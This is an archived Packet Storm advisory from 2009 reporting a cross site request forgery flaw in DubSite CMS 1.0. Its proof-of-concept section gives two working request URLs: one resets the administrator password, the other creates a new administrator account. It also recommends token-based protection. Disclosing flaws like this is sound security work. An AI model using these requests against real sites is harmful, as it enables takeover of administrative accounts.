exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DubSite CMS 1.0 Cross Site Request Forgery

DubSite CMS 1.0 Cross Site Request Forgery
Posted Dec 15, 2009
Authored by Connection

DubSite CMS version 1.0 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 37dfa00e0df1ed684660b0f815d142220760ab688b11387a59c89a1cff04496e
Download | Favorite | View

DubSite CMS 1.0 Cross Site Request Forgery

Change Mirror Download
Pentest Information:
====================
Connection has discovered a Cross Site Request Forgery(CSRF) vulnerability in DubSite CMS v1.0
 
 
Details
=======
Tested on OS:       Windows XP
Tested with Software:   Mozilla Firefox 3.5.x
 
Vulnerable Products:    DubSite CMS
Affected Versions:  1.0    
Vulnerability Type: Cross Site Request Forgery
Security-Risk:      High
 
Vendor-URL:         http://www.dubsite.net
Preview-URL:        http://www.opensourcecms.com/demo/1/282/Dubsite
 
Vendor-Status:      Not informed
Patch/Fix-Status:   Fixed version not released
Advisory-Status:    Written | 12/15/09
 
Advisory-URL:      
Report-URL:    
 
 
Introduction:
=============
Dubsite CMS is a minimalistic yet powerful approach to web content management. Dubsite is written in PHP, built upon the Zend Framework and published under the GNU General Public License. It's goal is to simplify effective management and handling of websites without being overbearing to non-technical users.
 
(Copy from the vendors homepage: http://www.dubsite.net)
 
More Details:
=============
Due to the lack of multiple input validation errors, an attacker is able to change the password of the administrative user
 
Proof of Concept:
=================
The following link will change the password of the administrative account. Changing the options will also allow you to change the name of the admin account:
 
http://server/dubsite/index.php/admin/users/accounts/edit/1?username=admin&userpassword=own3d&userpassword2=own3d&role_id=1&active=1&update=Update
 
This link creates a user "hax0r" with password test123 and adds it to the administrator group.
 
http://server/dubsite/index.php/admin/users/accounts?role_id=1&username=hax0r&userpassword=test123&userpassword2=test123&create=Create
 
Fix & Patch:
============
To fix the bugs a token system is highly advised
 
Security Risk:
==============
An attacker is able to change the password of the administrative user thus having complete control over the site. The risk is estimated as HIGH
 
Author:
=======
The Author & Writer is a Part of the HackTalk Security Group.
 
~CONNECTION
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close